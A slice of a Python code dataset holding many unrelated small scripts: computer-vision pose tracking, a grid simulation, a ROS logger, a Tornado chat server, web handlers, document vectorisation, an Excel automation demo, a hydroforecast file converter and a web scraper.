\n","sub_path":"appendixD/TimeLapse.py","file_name":"TimeLapse.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"541559308","text":"import pyrealsense2 as rs\nimport cv2\nimport numpy as np\nimport time\nfrom pupil_apriltags import Detector\nimport matplotlib.pyplot as plt\n\nfrom transforms3d.euler import mat2euler\nimport json\n\n\ndef test():\n \n at_detector = Detector(\n families=\"tag36h11\",\n nthreads=1,\n quad_decimate=1.0,\n quad_sigma=0.0,\n refine_edges=1,\n decode_sharpening=0.5,\n debug=0,\n )\n\n camera_params = [425.40704345703125, 425.40704345703125, 421.0938720703125, 246.84486389160156]\n tag_size = 0.030\n\n centers = []\n angles = []\n\n for i in range(200):\n image = cv2.imread(f\"/scratch/azimov/igor/data/physics/tmp/{i:04d}.png\", 0)\n \n tags = at_detector.detect(\n image,\n estimate_tag_pose=True,\n camera_params=camera_params,\n tag_size=tag_size,\n )\n\n if len(tags) == 1:\n centers.append(tags[0].pose_t)\n euler = mat2euler(tags[0].pose_R)\n print(euler)\n angles.append(euler[2])\n\n # print(tags)\n\n print(f\"{i:04d} / {200:04d}: {len(tags)}\")\n\n for i in range(1, len(angles)):\n a0 = angles[i-1]\n a1 = angles[i]\n if a0 - a1 > 270-30:\n angles[i] += 270 \n elif a0 - a1 > 180-30:\n angles[i] += 180 \n elif a0 - a1 > 90-30:\n angles[i] += 90\n elif a1 - a0 > 270-30:\n angles[i] -= 270 \n elif a1 - a0 > 180-30:\n angles[i] -= 180 \n elif a1 - a0 > 90-30:\n angles[i] -= 90\n\n times = [i / 90.0 for i in rage(200)]\n\n\n plt.figure()\n plt.subplot(2, 1, 1)\n plt.plot(times, [c[0] for c in centers], '-o', label=\"x\")\n plt.plot(times, [c[1] for c in centers], '-o', label=\"y\")\n # plt.plot([c[2] for c in centers], '-*', label=\"z\")\n plt.legend()\n\n plt.subplot(2, 1, 2)\n plt.plot(times, angles, '-o', label=\"angle\")\n plt.legend()\n\n plt.show()\n\n data = dict(time=times, center=centers, angle=np.rad2deg(angles).tolist())\n json_name = file_name.replace('.bag', '.json')\n with open(json_name, 'w') as f:\n json.dump(data, f)\n\n\nif __name__ == \"__main__\":\n test()\n","sub_path":"experimental_physics/tags.py","file_name":"tags.py","file_ext":"py","file_size_in_byte":2215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"648737712","text":"from random import randint\r\nimport random\r\nfrom numpy import diff\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\nnumofruns=0\r\nruns=[]\r\nsum=0\r\ntotalit=[]\r\np=0\r\n\r\nfor i in range (500):\r\n a=[[0 for i in range(150)] for j in range(100)]\r\n b=[[0 for i in range(150)] for j in range(100)]\r\n a[50][75]=1\r\n iterations=0\r\n numofones=0\r\n\r\n plot1x=[]\r\n plot1y=[]\r\n\r\n while(numofones!=15000):\r\n list1=[]\r\n while(len(list1)!=8):\r\n a1= randint(0,99)\r\n b1= randint(0,149)\r\n if [a1,b1] not in list1:\r\n list1.append([a1,b1])\r\n list2=[]\r\n while(len(list2)!=8):\r\n c1=randint(0,99)\r\n d1=randint(0,149)\r\n if [c1,d1] not in list1 and [c1,d1] not in list2:\r\n list2.append([c1,d1])\r\n\r\n for x in range (8):\r\n temp=a[(list1[x][0])][(list1[x][1])]\r\n a[(list1[x][0])][(list1[x][1])]=a[(list2[x][0])][(list2[x][1])]\r\n a[(list2[x][0])][(list2[x][1])]=temp\r\n\r\n for i in range (100):\r\n for j in range (150):\r\n if a[i][j]==1:\r\n for u in range (i-1,i+2):\r\n for v in range (j-1,j+2):\r\n if u>=0 and v>=0:\r\n u=u%100\r\n v=v%150\r\n if random.random() <= 0.25:\r\n b[u][v]=1\r\n\r\n for u in range (i-2,i+3):\r\n for v in range (j-2,j+3):\r\n if u>=0 and v>=0 and (u==i or u==i+2 or v==j or v==j+2):\r\n u=u%100\r\n v=v%150\r\n if random.random() <= 0.08 :\r\n b[u][v]=1\r\n\r\n for i in range (100):\r\n for j in range (150):\r\n if b[i][j]==1:\r\n a[i][j]=1\r\n\r\n numofones=0\r\n iterations+=1\r\n for i in a:\r\n for j in i:\r\n if j==1:\r\n numofones=numofones+1\r\n plot1x.append(iterations)\r\n plot1y.append(numofones)\r\n if p==0:\r\n plt.plot(plot1x, plot1y)\r\n plt.show()\r\n dy = diff(plot1y)\r\n dx = diff(plot1x)\r\n dydx = [i / j for i, j in zip(dy, dx)]\r\n dydx.append(0)\r\n plt.figure()\r\n poly = np.polyfit(plot1x, dydx, 20)\r\n poly_y = np.poly1d(poly)(plot1x)\r\n\r\n plt.plot(plot1x, dydx, color='black')\r\n plt.plot(plot1x, poly_y, color='red')\r\n plt.show()\r\n\r\n numofruns = numofruns + 1\r\n p = 10\r\n sum=sum+iterations\r\n runs.append(numofruns)\r\n totalit.append(iterations)\r\n\r\navg = sum / 500\r\nprint('The average number of iterations for 500 runs are', avg)\r\nplt.plot(runs, totalit)\r\nplt.show()\r\n","sub_path":"Submission/Assignment-2/SoC-assign2-code-DK.py","file_name":"SoC-assign2-code-DK.py","file_ext":"py","file_size_in_byte":2434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"244442704","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Author: Yuki Furuta \n\nimport rospy\nfrom mongodb_store.message_store import MessageStoreProxy\n\n\nclass LoggerBase(object):\n def __init__(self, db_name='jsk_robot_lifelog', col_name=None):\n super(LoggerBase, self).__init__()\n self.db_name = rospy.get_param('/robot/database','jsk_robot_lifelog')\n try:\n if col_name is None:\n self.col_name = rospy.get_param('/robot/name')\n else:\n self.col_name = col_name\n except KeyError as e:\n rospy.logerr(\"please specify param \\\"/robot/name\\\" (e.g. pr1012, olive)\")\n exit(1)\n\n self.task_id = None\n\n self.msg_store = MessageStoreProxy(database=self.db_name, collection=self.col_name)\n rospy.loginfo(\"connected to %s.%s\" % (self.db_name, self.col_name))\n\n def insert(self, msg, meta={}, wait=False):\n if self.task_id is not None:\n meta.update({ \"task_id\": self.task_id })\n return self.msg_store.insert(msg, meta, wait=wait)\n\n def spinOnce(self):\n self.task_id = rospy.get_param(\"/task_id\", None)\n\n","sub_path":"jsk_robot_common/jsk_robot_startup/src/jsk_robot_startup/lifelog/logger_base.py","file_name":"logger_base.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"537783516","text":"# -*- coding: utf-8 -*-\nimport tornado.httpserver\nimport tornado.ioloop\nimport tornado.options\nimport tornado.web\nfrom tornado.options import define, options\nimport json\nimport time\nimport tornado.websocket\n\nimport utils.uimethod\nimport utils.uimodules\nfrom data.user_modules import User, session\nfrom tornado.web import authenticated\nfrom pycket.session import SessionMixin\nimport datetime\n\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\ndefine(name='port', default=8000, help='run port', type=int)\n\n\nclass BaseHandler(tornado.web.RequestHandler, SessionMixin):\n def get_current_user(self):\n # current_user = self.get_secure_cookie('ID')\n current_user = self.session.get('user')\n if current_user:\n return current_user\n return None\n\n\nclass BaseWebSocketHandler(tornado.websocket.WebSocketHandler, SessionMixin):\n def get_current_user(self):\n current_user = self.session.get('user')\n if current_user:\n return current_user\n return None\n\n\nclass IndexHandler(BaseHandler):\n @authenticated\n def get(self):\n # self.write('

index---【已登录】


退出登录')\n self.render('11websocket_new.html')\n\n\nclass MessageWSHandler(BaseWebSocketHandler):\n users = set()\n\n def open(self):\n MessageWSHandler.users.add(self)\n print('---open---')\n\n def on_message(self, message):\n print(message, self.current_user)\n for u in self.users:\n u.write_message('%s-%s-说:%s' % (self.current_user, datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'), message))\n\n def on_close(self):\n if self in MessageWSHandler.users:\n MessageWSHandler.users.remove(self)\n print(MessageWSHandler.users)\n print('---close---')\n\n\nclass CookieLoginHandler(BaseHandler):\n def get(self):\n next_name = self.get_argument('next', '')\n self.render('10auth.html', error=None, next_name=next_name)\n\n def post(self):\n next_name = self.get_argument('next', '')\n username = User.by_name(self.get_argument('name', ''))\n pwd = self.get_argument('password', '')\n if username and username[0].password == pwd:\n # self.set_secure_cookie(name='ID', value=username[0].username, max_age=120)\n self.session.set('user', username[0].username)\n time.sleep(1)\n if next_name:\n self.redirect(next_name)\n else:\n self.redirect('/index')\n else:\n self.render('10auth.html', error='登录失败...请重新登录!', next_name=next_name)\n\n\nclass LogoutHandler(BaseHandler):\n def get(self):\n self.clear_all_cookies()\n self.redirect('/index')\n\n\nclass SyncHandler(BaseHandler):\n def get(self):\n time.sleep(10)\n id = self.get_argument('id', 13)\n user1 = User.by_id(id)\n user = {\n 'username': user1[0].username,\n 'userid': user1[0].id\n }\n self.write(user)\n\n\nif __name__ == '__main__':\n tornado.options.parse_command_line()\n app = tornado.web.Application(\n handlers=[\n (r'/index', IndexHandler),\n (r'/cookie_login', CookieLoginHandler),\n (r'/logout', LogoutHandler),\n (r'/websocket', MessageWSHandler),\n (r'/sync', SyncHandler),\n ],\n template_path='templates',\n # autoescape=None,\n static_path='static',\n ui_modules=utils.uimodules,\n ui_methods=utils.uimethod,\n cookie_secret='aasdasdasfgdfsdfsdfsdf',\n login_url='/cookie_login',\n pycket={\n 'engine': 'redis',\n 'storage': {\n 'host': '106.14.212.108',\n 'port': 6379,\n 'db_sessions': 5,\n 'db_notifications': 11,\n 'max_connections': 2**31,\n },\n 'cookies': {\n 'expires_days': 30,\n 'max_age': 600\n },\n },\n debug=True,\n )\n http_server = tornado.httpserver.HTTPServer(app)\n http_server.listen(options.port)\n tornado.ioloop.IOLoop.instance().start()\n","sub_path":"13asynchronous.py","file_name":"13asynchronous.py","file_ext":"py","file_size_in_byte":4188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"450232978","text":"#!/usr/bin/env python\n\"\"\" Furniture class\"\"\"\nfrom inventory_management.inventory_class import Inventory\n\n\nclass Furniture(Inventory):\n \"\"\" Furniture class\"\"\"\n def __init__(self: Inventory,\n product_code: str,\n description: str,\n market_price: float,\n rental_price: float,\n material=\"\",\n size=\"\"):\n \"\"\"\n Creates common instance variables from the parent class\n :rtype: Furniture\n \"\"\"\n\n super().__init__(product_code, description, market_price, rental_price)\n\n self.material = material\n self.size = size\n","sub_path":"students/tim_lurvey/lesson01/Assignment/inventory_management/furniture_class.py","file_name":"furniture_class.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"452329348","text":"import os\nimport webapp2\nimport jinja2\n\nJINJA_ENVIRONMENT = jinja2.Environment(\n loader=jinja2.FileSystemLoader(os.path.dirname(__file__)),\n extensions=['jinja2.ext.autoescape'],\n autoescape=True)\n\nclass Chloe(webapp2.RequestHandler):\n def get(self):\n\n template_values = {\n 'client': 'Chloe',\n 'photos': 41,\n 'title': 'Gallerie de Chloe (Meyzou photographie)'\n }\n\n template = JINJA_ENVIRONMENT.get_template('static_website/chloe.html')\n self.response.write(template.render(template_values))\n\nclass MainPage(webapp2.RequestHandler):\n def get(self):\n\n template_values = {}\n\n template = JINJA_ENVIRONMENT.get_template('static_website/index.html')\n self.response.write(template.render(template_values))\n\napplication = webapp2.WSGIApplication([\n ('/', MainPage),\n ('/chloe', Chloe),\n], debug=True)\n","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"19916614","text":"from pyspark.mllib.feature import HashingTF\nfrom pyspark.mllib.regression import LabeledPoint\n\nfrom utils import Utils\n\nclass Document:\n \n\tdicIdf = {}\n\tfileName = '/home/manh/Documents/git/manhdoi/reishi_batch/output/idf_hash.txt'\n\tfile = open(fileName, 'r')\n \n\tfor line in file:\n\t\tsplit = line.split(' ')\n\t\tif split[1].rstrip('\\n') in dicIdf:\n\t\t\tcontinue\n\t\tdicIdf[split[1].rstrip('\\n')] = split[0]\n\tfile.close()\n \n\tutils = Utils(15000)\n \n\tdef __init__(self, id, content, timestamps):\n\t\tself.id = id\n\t\tself.class_id = ''\n\t\tself.cluster_id = ''\n\t\tself.content = content\n\t\tself.vector = ''\n\t\tself.timestamps = timestamps\n\t\t\n\tdef doc2vec(self):\n\t\tcontentSplit = self.content.split()\n\t\tcontentHash = {}\n\t\tcontentResult = ''\n\t\tfor w in contentSplit:\n\t\t\thash = Document.utils.createHashing(w)\n\t\t\tif hash != -1:\n\t\t\t\tif(hash in contentHash) == False:\n\t\t\t\t\tcontentHash[hash] = 1\n\t\t\t\telse:\n\t\t\t\t\tcontentHash[hash] = contentHash[hash] + 1\n\t\tsortedKey = sorted(contentHash.keys())\n\t\tfor k in sortedKey:\n\t\t\tif(str(k) in Document.dicIdf) == True:\n\t\t\t\tself.vector = '%s;%d %.4f' % (self.vector, k, float(contentHash[k]) * float(Document.dicIdf[str(k)]))\n\t\tself.vector = self.vector[+1:]\n \n\tdef printVec(self):\n\t\tprint(self.vector)\n \nclass DocumentKmeans(Document):\n\t\n\tdef __init__(self, id, vector, timestamps):\n\t\tself.id = id\n\t\tself.vector = vector\n\t\tself.cluster_id = ''\n\t\tself.timestamps = timestamps\n\t\n\tdef kmeansVec(self):\n\t\tself.parsedData = [0 for i in range(Utils.numOfWord)]\n\t\tvecSplit = self.vector.split(';')\n\t\tif len(vecSplit) > 0:\n\t\t\tfor vs in vecSplit:\n\t\t\t\tif len(vs) > 0:\n\t\t\t\t\tvSplit = vs.split()\n\t\t\t\t\tself.parsedData[int(vSplit[0])] = float(vSplit[1])\n\t\t\t\t\t\n\tdef toString(self):\n\t\tresult = ''\n\t\tfor v in self.parsedData:\n\t\t\tresult = result + str(v) + ' '\n\t\treturn result\n\t\t \nclass DocumentSVM(Document):\n\tdef __init__(self, label, vector):\n\t\tself.label = label\n\t\tself.vector = vector\n\t\tself.id = ''\n\t\tself.class_id = ''\n\t\tself.timestamps = None\n \n\tdef svmVec(self):\n\t\tself.parsedData = [0 for i in range(Utils.numOfWord)]\n\t\tsplits = self.vector.split(';')\n\t\tif len(splits) > 0:\t\t\n\t\t\tfor vs in splits:\n\t\t\t\tif len(vs) > 0:\n\t\t\t\t\tvSplit = vs.split()\n\t\t\t\t\tself.parsedData[int(vSplit[0])] = float(vSplit[1])\n\t\treturn LabeledPoint(float(self.label), self.parsedData)\n \n\tdef printDoc(self):\n\t\tprint('%s:%s\\n' % (self.id, self.class_id))\n","sub_path":"reishi_batch/src/document.py","file_name":"document.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"500083950","text":"from tkinter import Tk\r\nfrom tkinter.messagebox import showwarning\r\nfrom time import sleep\r\n\r\n#from tkintertkMessageBox import showwarning\r\n\r\nimport win32com.client as win32\r\n#https://github.com/mhammond/pywin32/releases\r\n#download and execute as admin\r\n\r\nwarn = lambda app: showwarning(app, 'Exit?')\r\nRANGE = range(3, 8)\r\n\r\ndef excel():\r\n app = 'Excel'\r\n x1 = win32.gencache.EnsureDispatch('%s.Application' %app)\r\n ss = x1.Workbooks.Add()\r\n sh = ss.ActiveSheet\r\n x1.Visible = True\r\n sleep(1)\r\n\r\n sh.Cells(1, 1).Value = 'Python-to-%s Demo ' %app\r\n sleep(1)\r\n for i in RANGE:\r\n sh.Cells(i, 1).Value = 'Line %d' % i\r\n sh.Cells(i+2, 1).Value = \"Th-th-th-that's all folks!\"\r\n\r\n warn(app)\r\n ss.Close(False)\r\n x1.Application.Quit()\r\n\r\nif __name__ =='__main__':\r\n Tk().withdraw()\r\n excel()\r\n","sub_path":"Chat7/excel.pyw","file_name":"excel.pyw","file_ext":"pyw","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"336279481","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\nimport sublime, sublime_plugin\r\nimport os\r\nimport sys\r\n\r\nclass PhpFormatterCommand(sublime_plugin.TextCommand):\r\n def run(self, edit):\r\n reload(sys)\r\n sys.setdefaultencoding(\"utf-8\")\r\n # projectパスの取り方はこれでいいのか?\r\n #projectDir = self.view.window().folders()[0]\r\n\r\n pluginPath = sublime.packages_path() + \"\\\\User\\\\php_formatter\\\\\"\r\n tempPath = os.environ.get('TEMP', '')\r\n if tempPath == \"\":\r\n sublime.message_dialog(u\"環境変数[TEMP]が取得できません。\")\r\n return\r\n\r\n #print(self.view.file_name())\r\n phpCBPath = pluginPath + \"phpCB.bat\"\r\n #phpCBPath = pluginPath + \"hoge.bat\"\r\n # 半角スペースを含むのでダブルコーテーションで囲む\r\n phpCBPath = '\"' + phpCBPath + '\"'\r\n phpCBPath = phpCBPath + \" \" + self.view.file_name()\r\n print(phpCBPath)\r\n os.system(phpCBPath)\r\n\r\n # 1次ファイルパス\r\n tempFilePath = tempPath + \"\\\\phpcb.php\"\r\n source = open(tempFilePath).read()\r\n\r\n regionAll = sublime.Region(0, self.view.size())\r\n self.view.replace(edit, regionAll, source)\r\n # self.view.replace(edit, regionAll, source)\r\n\r\n # sublime.packages_path() + \"User\\php_formater.bat\"\r\n #print(sublime.packages_path())\r\n\r\n # 再描画\r\n # self._force_refresh()\r\n\r\n","sub_path":"php_formatter.py","file_name":"php_formatter.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"31802346","text":"from gi.repository import Gtk\nfrom gi.repository import Granite\n\nclass HideEntryWindow(Gtk.Window):\n\n\tdef __init__(self):\n\t\tGtk.Window.__init__(self, title=\"HintedEntry Demo\")\n\t\tself.set_border_width(10)\n\n\t\thbox = Gtk.Box(spacing=6)\n\t\tself.add(hbox)\n\n\t\ttestbutton = Gtk.Button(\"This is a test\")\n\t\thbox.pack_start(testbutton, True, True, 0)\n\n\t\thintedentry = Granite.WidgetsHintedEntry()\n\t\thbox.pack_start(hintedentry, True, True, 0)\n\n\t\tdef onChanged(self):\n\t\t\tprint(hintedentry.get_text())\n\n\t\thintedentry.connect(\"changed\", onChanged)\n\t\t### XXX not working?\n\t\thintedentry.set_has_clear_icon(0)\n\t\thintedentry.set_hint_string(\"This is a hint.\")\n\nwin = HideEntryWindow()\nwin.connect(\"delete-event\", Gtk.main_quit)\nwin.show_all()\nGtk.main()\n","sub_path":"hintedentry.py","file_name":"hintedentry.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"586027486","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom multiprocessing.connection import Client\n\n\nclass RpcProxy:\n def __init__(self, connection):\n self._connection = connection\n\n def __getattr__(self, item):\n def rpc(*args, **kwargs):\n self._connection.send((item, args, kwargs))\n result = self._connection.recv()\n if isinstance(result, Exception):\n raise result\n return result\n\n return rpc\n\n\nc = Client(('localhost', 17000), authkey=b'peekaboo')\nproxy = RpcProxy(c)\nr = proxy.test(2, 3)\nprint(r)\n","sub_path":"python_cook_book/p_11/p_11_15.py","file_name":"p_11_15.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"572247548","text":"from bingen_hydroforecast_realtime_files_lib import RealtimeFilesMethods\nfrom def_system import FolderDefinition, BinDefinition, Debug\nfrom bingen_interface import BinGenInterface\nfrom bin_lib import BinaryLibrary, H5FileReader\nimport numpy as np\nimport shutil\nimport pickle\nimport time\nimport h5py\nimport sys\nimport os\n\ndebug_level_arg = 3\n\n# ####################################################### ARGS ####################################################### #\n\nmodel_id_arg = BinGenInterface.get_model_id(sys.argv) # useless step\ntimestamp_arg = BinGenInterface.get_timestamp(sys.argv)\nrunset_id_arg = BinGenInterface.get_runset_id(sys.argv)\n\n\n# ####################################################### DEFS ####################################################### #\n\n\ndef update_local_bins_from_database(model_id, runset_id, timestamp=None, debug_lvl=0):\n \"\"\"\n Reads the data from database and generates binary files for given hydro-forecasts\n :param model_id:\n :param runset_id:\n :param timestamp: If None, retrieves the most recent hydro-forecasts available\n :param debug_lvl:\n :return: None. Changes are perform at file system level\n \"\"\"\n\n # basic check\n if model_id is None:\n Debug.dl(\"bingen_hydroforecast_inst_h5: At least a model id must be provided.\", 1, debug_lvl)\n return\n\n # start counting time for debug\n start_time = time.time() if debug_lvl > 0 else None\n\n # define file name\n h5_folder_path = RealtimeFilesMethods.get_folder_with_h5_files(model_id, runset_id)\n h5_file_prefix = RealtimeFilesMethods.get_h5_file_name_prefix(model_id, runset_id)\n\n # define timestamp and basic check\n if timestamp is None:\n the_timestamp = RealtimeFilesMethods.get_current_timestamp_from_hdf5_files(h5_folder_path, h5_file_prefix,\n debug_lvl=debug_lvl)\n else:\n the_timestamp = timestamp\n if the_timestamp is None:\n Debug.dl(\"bingen_hydroforecast_inst_h5: Unable to define a timestamp.\", 1, debug_lvl)\n return\n\n # define file path and try to read it\n hdf5_file_path = os.path.join(h5_folder_path, \"{0}{1}.h5\".format(h5_file_prefix, the_timestamp))\n\n '''\n\n Debug.dl(\"bingen_hydroforecast_inst_h5: Reading file '{0}'.\".format(hdf5_file_path), 1, debug_lvl)\n h5_file_data = get_data_from_hdf5_file(hdf5_file_path, debug_lvl=debug_lvl)\n if h5_file_data[0] is None:\n Debug.dl(\"bingen_hydroforecast_inst_h5: Unable to retrieve hydroforecast for {0} at {1}.\".format(\n model_id, the_timestamp), 1, debug_lvl)\n return None\n\n # process file data\n min_timestamp = None\n count_prints = 0\n max_prints = 10\n ret_dictionary = {}\n last_linkid = h5_file_data[0][0]\n cur_linkid_timeseries = []\n for cur_row in h5_file_data:\n\n cur_linkid = cur_row[0]\n cur_timestamp = int(the_timestamp + (cur_row[1] * 60))\n cur_discharge = cur_row[2]\n\n if cur_linkid != last_linkid:\n ret_dictionary[last_linkid] = cur_linkid_timeseries\n cur_linkid_timeseries = []\n cur_linkid_timeseries.append([cur_timestamp, cur_discharge])\n\n # check timestamp if minimum\n if (min_timestamp is None) or (cur_timestamp < min_timestamp):\n min_timestamp = cur_timestamp\n\n # debug poor\n if count_prints < max_prints:\n count_prints += 1\n\n last_linkid = cur_linkid\n if len(cur_linkid_timeseries) > 0:\n ret_dictionary[last_linkid] = cur_linkid_timeseries\n\n # get reference timestamp and save binary file\n cur_timestamp = min_timestamp if timestamp is None else timestamp\n save_binary_file(model_id, runset_id, cur_timestamp, ret_dictionary, debug_lvl=debug_lvl)\n\n '''\n\n # replace above by the following\n copy_h5_file(hdf5_file_path, runset_id, model_id, \"fq\", the_timestamp, debug_lvl=debug_lvl)\n\n # debug info\n d_time = time.time()-start_time\n Debug.dl(\"bingen_hydroforecast_inst_h5: \"\n \"update_local_bins_from_database({0}) function took {1} seconds.\".format(model_id, d_time), 1, debug_lvl)\n\n return\n\n\ndef get_data_from_hdf5_file(hdf5_file_path, debug_lvl=0):\n \"\"\"\n\n :param hdf5_file_path:\n :param debug_lvl:\n :return:\n \"\"\"\n\n # basic check - file must exist\n if (hdf5_file_path is None) or (not os.path.exists(hdf5_file_path)):\n Debug.dl(\"bingen_states_inst_asynchmodel254_hdf5: File '{0}' does not exist.\".format(hdf5_file_path), 1, debug_lvl)\n return None, None\n\n # import data into matrix\n with h5py.File(hdf5_file_path, 'r') as hdf_file:\n hdf_data = np.array(hdf_file.get('outputs'))\n\n return hdf_data\n\n\ndef save_binary_file(model_id, runset_id, timestamp, hydroforecast_dictionary, debug_lvl=0):\n \"\"\"\n\n :param model_id:\n :param runset_id:\n :param timestamp:\n :param hydroforecast_dictionary:\n :param debug_lvl:\n :return:\n \"\"\"\n\n product_id = \"fq\"\n\n # basic check\n if hydroforecast_dictionary is None:\n return\n\n bin_file_path = FolderDefinition.get_intermediate_bin_file_path(model_id, product_id, timestamp,\n runset_id=runset_id)\n\n # create folder if necessary\n bin_folder_path = FolderDefinition.get_intermediate_bin_folder_path(model_id, product_id, runset_id=runset_id)\n if not os.path.exists(bin_folder_path):\n os.makedirs(bin_folder_path)\n\n Debug.dl(\"bingen_hydroforecast_inst_h5: Saving '{0}' file.\".format(bin_file_path), 2, debug_lvl)\n with open(bin_file_path, \"wb\") as w_file:\n pickle.dump(hydroforecast_dictionary, w_file)\n\n Debug.dl(\"bingen_hydroforecast_inst_h5: Binary file saved: '{0}'.\".format(bin_file_path), 1, debug_lvl)\n\n return\n\n\ndef copy_h5_file(h5_file_path, sc_runset_id, sc_model_id, sc_product_id, timestamp, debug_lvl=0):\n \"\"\"\n\n :param h5_file_path:\n :param sc_runset_id:\n :param sc_model_id:\n :param sc_product_id:\n :param timestamp:\n :param debug_lvl:\n :return:\n \"\"\"\n\n dest_file_path = BinaryLibrary.get_binary_file_path(sc_runset_id, sc_model_id, sc_product_id, timestamp,\n debug_lvl=debug_lvl)\n\n shutil.copy(h5_file_path, dest_file_path)\n H5FileReader.create_linkid_index_asynch_hydrograph_h5(dest_file_path, debug_lvl=debug_lvl)\n\n Debug.dl(\"bingen_hydroforecast_inst_h5: Copied file to '{0}'.\".format(dest_file_path), 1, debug_lvl)\n\n\ndef import_hdf_as_sparce_snapshots(h5_file_path, sc_runset_id, sc_model_id, sc_product_id, debug_lvl=0):\n \"\"\"\n\n :param h5_file_path:\n :param sc_runset_id:\n :param sc_model_id:\n :param sc_product_id:\n :param debug_lvl:\n :return:\n \"\"\"\n return None\n\n\n# ####################################################### CALL ####################################################### #\n\nupdate_local_bins_from_database(model_id_arg, runset_id_arg, timestamp_arg, debug_lvl=debug_level_arg)\n","sub_path":"backend/model_3_0_scripts/python/libs/bingen_hydroforecast_inst_h5.py","file_name":"bingen_hydroforecast_inst_h5.py","file_ext":"py","file_size_in_byte":7025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"598371431","text":"from bs4 import BeautifulSoup\nimport requests\n\n\nelementslist = []\nelementswebsite = requests.get(\"https://www.britannica.com/topic/list-of-chemical-elements-2026117\")\nelementswebsitecontent = BeautifulSoup(elementswebsite.content, 'lxml')\nfor element in elementswebsitecontent.find_all(\"li\"):\n elementslist.append(element.text)\n\n# print(elementslist.index(\"actinium (89)\")) used for finding first element index to use\n# print(elementslist.index(\"zirconium (40)\")) used for finding second element index to use\nnewelementslist = []\nfor x in elementslist[13: 131]:\n seperator = \"(\"\n textelement = x.split(seperator, 1)[0]\n\n newelementslist.append(textelement)\nchristmascarolwebsiteandcontent = BeautifulSoup(requests.get(\"http://employees.oneonta.edu/helsertl/ChemXmasCarol.html\").content, 'lxml')\nchristmascaroltext = christmascarolwebsiteandcontent.text\ncounter = 0\nwords = christmascaroltext.split(\" \")\npureelements = newelementslist\nnewelementslist.append(\"ium\")\nnewelementslist.append(\"gen\")\nnewelementslist.append(\"ny\")\nnewelementslist.append(\"er\")\nnewelementslist.append(\"ld\")\nnewelementslist.append(\"ne\")\nchemistryanswers = []\n\nfor word in words:\n for element in newelementslist:\n if element in word and ((word in chemistryanswers) == False):\n chemistryanswers.append(word)\n else:\n pass\nfor x in chemistryanswers:\n print(x)\nprint(f\"\"\"\nThe amount of words in the Chemistry Carol Text is {len(words)} but the filtered\namount of words in my list above is {len(chemistryanswers)} but the hw wants you to get 86 words \nso this saved some time. Just use your eyes now and filter through which ones look like or are \nstraight up elements and you're good. \n- Shashi ;)\n \"\"\")\n\n","sub_path":"chemistrychristmascarol.py","file_name":"chemistrychristmascarol.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"343097469","text":"import cv2\nimport numpy as np\n\ndef Select_Pts(event, x, y, flags, param):\n mod_img = param[1].copy()\n if event == cv2.EVENT_LBUTTONDOWN:\n if len(param[0]) < 4:\n param[0].append([x, y])\n print(param[0])\n \n if event == cv2.EVENT_RBUTTONDOWN:\n if len(param[0]) != 0:\n param[0].pop()\n print(param[0])\n for pt in param[0]:\n mod_img = cv2.circle(mod_img, (pt[0], pt[1]), 5, (255, 0, 0), -1)\n cv2.imshow(\"dash\", mod_img)\n\nimg = cv2.imread(\"dashcam.jpg\")\n#img = cv2.resize(img, (int(0.25*img.shape[0]), int(0.25*img.shape[1])))\n\nwidth = img.shape[1]\nheight = img.shape[0]\n\ndst_pts = [\n [0,0],\n [width,0],\n [width, height],\n [0, height]\n]\nsrc_pts = []\n\ncv2.imshow(\"dash\", img)\n\nprint(\"Left click to add point. Right click to remove point.\")\nprint(\"select points going from top left, then proceeding clockwise\")\nprint(\"Press any key to finalize points\")\ncv2.setMouseCallback(\"dash\", Select_Pts, [src_pts, img])\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\ncv2.imshow(\"dash_original\", img)\n\nM = cv2.getPerspectiveTransform(np.array(src_pts, dtype=np.float32),\n np.array(dst_pts, dtype=np.float32))\nwarped_img = cv2.warpPerspective(img, M, (width, height),\n flags=cv2.INTER_LINEAR, \n borderMode=cv2.BORDER_CONSTANT)\n\ncv2.imshow(\"warped\", warped_img)\n\nprint(\"Press any key to exit.\")\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","sub_path":"Simulations/VehicleVisionSim.py","file_name":"VehicleVisionSim.py","file_ext":"py","file_size_in_byte":1494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"284025021","text":"from models.category import 